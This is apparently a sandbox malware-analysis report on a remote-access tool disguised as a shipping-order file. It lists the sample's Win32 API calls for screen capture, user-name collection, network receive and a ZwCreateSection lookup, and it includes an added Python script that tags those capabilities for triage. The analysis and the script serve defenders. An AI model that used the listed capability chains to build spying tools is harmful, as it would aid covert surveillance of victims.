                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                      • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                      • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                      • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                      • String ID:
                                                      • API String ID: 1815803762-0
                                                      • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                      • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                      • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                      • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                      • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                      • ExitProcess.KERNEL32 ref: 0044258E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                      • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                      • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                      • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-248832578
                                                      • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                      • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                      • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                      • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID: <D
                                                      • API String ID: 1084509184-3866323178
                                                      • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                      • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                      • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                      • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID: <D
                                                      • API String ID: 1084509184-3866323178
                                                      • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                      • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                      • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                      • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2299586839-2904428671
                                                      • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                      • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                      • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                      • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                      • String ID:
                                                      • API String ID: 1663032902-0
                                                      • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                      • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                      • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                      • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                      • String ID:
                                                      • API String ID: 2692324296-0
                                                      • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                      • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                      • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                      • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                      • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                      • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                      • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                      APIs
                                                        • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                      • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                      • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                      • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                      • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                      • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                      • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                      • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                      APIs
                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                      • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                      • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                      • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
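The function entries in this section record each function's Win32 calls as `Name.MODULE(args), ref: address` bullets, with calls made by callees marked `Part of subcall function`. What a triager wants from that listing is a per-function capability tag plus a filter for compiler-runtime sequences that trip generic signatures: the IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter triple at 0043A755 is the sequence the MSVC CRT runs when a /GS stack-cookie check fails, not an anti-debug routine the malware author wrote, whereas the CreateDCA("DISPLAY"), CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, GetIconInfo chain at 00417FB9 is a screen grab with the cursor drawn on top. The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: it parses a constructed excerpt of the bullets from this section and tags each function. The capability labels, the ordered chains and the `parse_entries`, `classify` and `triage` names are this example's own choices.

```python
import re

# Joe Sandbox lists one Win32 call per bullet inside a function entry:
#   "Name.MODULE(arg,arg,...), ref: ADDR"   or   "Name.MODULE ref: ADDR"
# Bullets prefixed "Part of subcall function X:" belong to a callee, not to the function itself.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
HEX32 = re.compile(r"^[0-9A-F]{8}$")

# Constructed excerpt of the function entries in this report section (same bullets, trimmed).
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
Memory Dump Source
APIs
• GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
• TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
• ExitProcess.KERNEL32 ref: 0044258E
Memory Dump Source
APIs
• GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
Memory Dump Source
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
Memory Dump Source
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetIconInfo.USER32(?,?), ref: 004180CB
Memory Dump Source
"""


def parse_entries(text):
    # One entry runs from an "APIs" header to the next "Memory Dump Source"; unknown lines are skipped.
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            current = {"calls": [], "subcalls": []}
            entries.append(current)
        elif line == "Memory Dump Source":
            current = None
        elif current is not None and (m := API_LINE.match(line)):
            args_text = m.group("args")
            rec = {"name": m.group("name"), "module": m.group("module"), "ref": int(m.group("ref"), 16),
                   "args": [a.strip() for a in args_text.split(",")] if args_text else []}
            (current["subcalls"] if m.group("sub") else current["calls"]).append(rec)
    return entries


def calls_in_order(entry):
    # Direct calls of the function sorted by address, i.e. the order the compiler emitted them.
    return [c["name"] for c in sorted(entry["calls"], key=lambda c: c["ref"])]


def contains_chain(names, chain):
    # True when every API in chain occurs in names in that relative order (subsequence test).
    it = iter(names)
    return all(want in it for want in chain)


# Ordered API chains and the label each one earns (this example's own vocabulary).
CAPABILITY_CHAINS = {
    "screen capture (display DC, compatible bitmap, StretchBlt)":
        ("CreateDCA", "CreateCompatibleDC", "CreateCompatibleBitmap", "SelectObject", "StretchBlt"),
    "cursor overlay on captured frame": ("GetIconInfo",),
    "collects current user name": ("GetUserNameW",),
    "self-termination": ("TerminateProcess",),
    "debugger presence check": ("IsDebuggerPresent",),
}
# Exactly this sequence is the MSVC CRT's /GS stack-cookie failure handler (IsDebuggerPresent,
# SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter): compiler runtime, not author code.
CRT_GS_FAILURE = ("IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter")


def classify(entry):
    names = calls_in_order(entry)
    crt = tuple(names) == CRT_GS_FAILURE
    caps = [label for label, chain in CAPABILITY_CHAINS.items()
            if contains_chain(names, chain) and not (crt and chain == ("IsDebuggerPresent",))]
    # Literal (non-hex, non-"?") arguments are the cheapest pivots, e.g. "DISPLAY" or "5.3.0 Pro".
    literals = [a for c in entry["calls"] for a in c["args"] if a and a != "?" and not HEX32.match(a)]
    return {"first_ref": min((c["ref"] for c in entry["calls"]), default=None),
            "capabilities": caps, "crt_gs_failure": crt, "literals": literals}


def triage(text):
    return [classify(e) for e in parse_entries(text)]


if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f"{r['first_ref']:08X} crt={r['crt_gs_failure']} caps={r['capabilities']} literals={r['literals']}")
```

Only a function's direct calls are sequenced; subcall bullets are kept apart because the report repeats the same callee group under every caller (the 00446EBF GetLastError, _free, _abort set appears under several locale functions here) and would otherwise inflate each caller's profile. The chain test is a subsequence match, so interleaved housekeeping such as DeleteDC does not break a detection.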
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                      • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                      • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                      • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                      • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                      • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                      • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                      • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                      • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                      APIs
                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                        • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                      • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                      • DeleteDC.GDI32(?), ref: 0041805D
                                                      • DeleteDC.GDI32(00000000), ref: 00418060
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                      • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                      • GetIconInfo.USER32(?,?), ref: 004180CB
                                                      • DeleteObject.GDI32(?), ref: 004180FA
                                                      • DeleteObject.GDI32(?), ref: 00418107
                                                      • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                      • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                      • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                      • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                      • DeleteDC.GDI32(?), ref: 0041827F
                                                      • DeleteDC.GDI32(00000000), ref: 00418282
                                                      • DeleteObject.GDI32(00000000), ref: 00418285
                                                      • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                      • DeleteObject.GDI32(00000000), ref: 00418344
                                                      • GlobalFree.KERNEL32(?), ref: 0041834B
                                                      • DeleteDC.GDI32(?), ref: 0041835B
                                                      • DeleteDC.GDI32(00000000), ref: 00418366
                                                      • DeleteDC.GDI32(?), ref: 00418398
                                                      • DeleteDC.GDI32(00000000), ref: 0041839B
                                                      • DeleteObject.GDI32(?), ref: 004183A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                      • String ID: DISPLAY
                                                      • API String ID: 1765752176-865373369
                                                      • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                      • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                      • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                      • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041728F
